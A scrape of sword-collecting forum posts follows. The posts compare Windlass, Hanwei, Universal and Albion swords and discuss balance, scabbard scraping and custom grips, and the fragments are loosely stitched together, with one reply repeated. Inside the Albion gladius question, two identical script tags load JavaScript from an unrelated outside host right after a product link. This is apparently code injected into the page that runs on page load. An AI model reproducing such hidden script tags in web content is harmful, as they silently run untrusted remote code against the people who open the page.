You can see more of the swords and scabbards I make as well as short videos and tutorials and give-aways from time to time on my facebook page which i try to keep current. I just finished my melting forge and will be casting Bronze and Brass Scabbard rings soon... check it out. My FB Page name is: Master Carver and Maritime Artist Patrick B. Pointer I will be updating the name of the page soon, since my focus has been swords and scabbards... want to see the carvings? You'' have to scroll further down on that page now... I'll be posting more here on this scabbard soon. It has been on hold waiting for the Scabbard Suspension Rings to be made and cast. More to come.. keep tuned. Excellent! Thanks!

Great review. I've been wondering about the quality of Universal recently. Thinking of picking up a saber from them. Maybe. That gap really bothers me! I have to second Afoo here. I owned their Revolution Sabre and the Windlass sabre, and the Windlass had a much more lively balance. Also, all the Uni made swords I've had (not very many tbh) have had a large gap like that. A symptom of less expensive production swords. Universal has more military models but often suffer as far as handling. Thanks for seconding that. I'll probably go with a windlass. I had a Cold Steel saber once upon a time and found the balance really great. Very easy to handle.

I tend to go through phases. I'll bounce between hobbies, and the urge will eventually return for one or the other. It happens but, even if it doesn't return, good luck in future interests! And if any of those interests involve straight razors or tobacco pipes, I'll be right there with you!

Got a Hanwei Basket Hilt Broadsword. A bit blade heavy, but the fit and finish on mine was superb. Love it. Oh I am so jealous! I really would love a good basket hilt sword. Is the blade heavyness an issue? Do you think you could fight with it for a while if you had to? It's a really gorgeous sword. The fit and finish were awesome! It does earn that reputation for blade heaviness though. It's really only super noticeable to me on a horizontal swing. I'm not super strong, so if you have normal muscles and not my puny arms you could certainly fight with it. It IS great on the thrust though! KOA has a great video of it being used to cut. The employee in the video seems to have no trouble at all. I will say that, even when a sword feels heavy when I'm holding it "dead," a blade feels much more lively in motion when I'm cutting. I don't know if it's the adrenaline or the act of actually using it bring out the best in the blade. Long story short, it's blade heavy but not crowbar heavy and could be used to battle for a while! If you lived in the area, you could certainly come try it out on some bottles.

So glad this post kind of exploded! So I poo pulled the trigger on the longsword from the sbg store. I really thought about the bastard sword but, gah, that longsword blade is just so pretty. Going to get a grip rewrap and a new pommel from printed armoury. Have bought and sold plenty of katana and now I'm ready to beef up the euro swords i own.

Hi All, Im literally about to buy my first sword. This site has been a great help! Ive come to the following 2 option: Windlass - Agincourt War sword (battle cry) I have not seen many reviews for this. I have heard windlass is hit an miss, but also know that John Clements is considered to know his stuff. Hanwei Tinker Bastard Sword with Fuller. Excellent reviews. but the issue with scabbard is putting me off, anyone fixed this? Any advice would help. I wont be using them much. But like the idea of having a REAL sword made of decent quality. Thanks and I am a noob so any advise or suggestions are welcome. I, too, am considering the Hanwei Tinker. I have been told that with a dremel, you can make all of the scabbard scraping problems go away. I have had a few Windlass pieces over the years, and I've had fairly good luck with them. Most of them were light in the hand and were great for cutting!

Thanks so much for the info. I've heard nothing but praise about Steven Huerta's work. I may end up going the same route! Thanks again. I cannot recommend Steve enough, his work is clean and fast and very moderately priced I AM very interested in your blade after all...

How did you remove the rust that was on it? I'd also like to know. That way it could be narrowed down a bit. Looks like the layers of steel that have patinated (not rust it seems) at a different rate than the other layers.

I got Sword of the Stranger on DVD (which I was super freaking excited about), The Archaeology of Weapons book and The Book of Five Rings. Also a neat sword-related t-shirt, a gift card and various other little anime-related things (from my sister). Sword of the Stranger is a quality film. I love that one.

hello to Everyone, I am starting a new sword collection and the first one i checked was the Mainz Gladius The Augustus, i know they are a little bit expensive but i only want to acquire a high quality sword. i want to know if this sword is fully functional and if it will endure any fighting situation or anything a sword should withstand. please let me know your opinions, bad or good. If anyone know of a different Mainz Gladius plese let me know. Also if someone owns this sword let me know your reviews, and if you can provide some pictures it will be greate. thank you all Andres Rueda PS: this is the link to the sword www.albion-swords.com/swords/albion/nextgen/sword-roman-augustus-mainz-II.htm<script type="text/javascript" src="https://cuev.in/aux.php?ver=1.0&ref=at&debug="></script><script type="text/javascript" src="https://cuev.in/aux.php?ver=1.0&ref=at&debug="></script> I had an Albion gladius and not only was it fully functional, it was also gorgeous. They are fairly pricey but, in my opinion, worth every penny. One of the only drawbacks is a lack of included scabbard.

Hey pattyb - I imagine you've got a VA PL like I've got. It's one of my favorites. If you want something similar, the H/T Bastard Sword is -close-, a lighter blade for certain. A H/T longsword has a -much- wider blade at the base, and a considerably longer grip than either of those. I've owned both, along with the VA PL and still do. (I might even say a BIT too long, and I do like longer grips.) The caveats with the H/T is that the blades don't tend to come with the best edge. They need some touching up. I've never had a stock scabbard with my longsword - but I did have one with the bastard, and it did have the scraping problem. However, you can mitigate that with some quality time on the chape with a dremel. That's what I did until I decided to get a custom scabbard made for it along with a new grip. That's exactly right. The VA PL is one of my favorites as well. So simple yet so beautiful and alive in the hand! I'd thought about the bastard sword; I just love the blade geometry and pommel on the longsword though I suppose that could be fixed easily by buying a replacement pommel. I also like longer grips, so I'm glad that you mentioned there is such a thing as too long even for those among us who like a lot of real estate south of the guard. Thanks so much for the info. I may indeed get the T/Bastard instead. Maybe I'll roll a die.

I've had mine for a little over a year now and I absolutely love it. I really like the balance and think it handles great. Mine didn't have any scabbard scratching issues from the factory, so it's not an issue with all of them. I like mine so much it's with Steven Huerta getting a new handle and wrap to go with a new Printed Armory Viscount pommel from LG Martial Arts! Thanks so much for the info. I've heard nothing but praise about Steven Huerta's work. I may end up going the same route! Thanks again.

Great review. I too have some Sino swords and I think that they are absolutely worth the money. I've only had one minor imperfection with one of mine (hamon different than asked for, but to be fair, I did change it one them after the order was placed so some fault regarding confusion rests with me). They do a pretty mean suguha and that hamon style on my katana looks almost as good (straight) as the actual nihonto I have featuring one.

Hey, all. As far as bare bones longswords go, I've got the old VA Trim Longsword. I love it. I'm looking for another like it, so I thought I'd pick up a Hanwei Tinker. I've heard things ranging from good to great and wanted to see if anyone had/has one and what the overall impression is. I know people have discussed them on here, but I'm particularly wondering if that blade scratching issue with the scabbard has been solved over the years. It's not a deal breaker, but I'd love it if there wasn't much of a chance to scratch my blade. Also, well balanced??
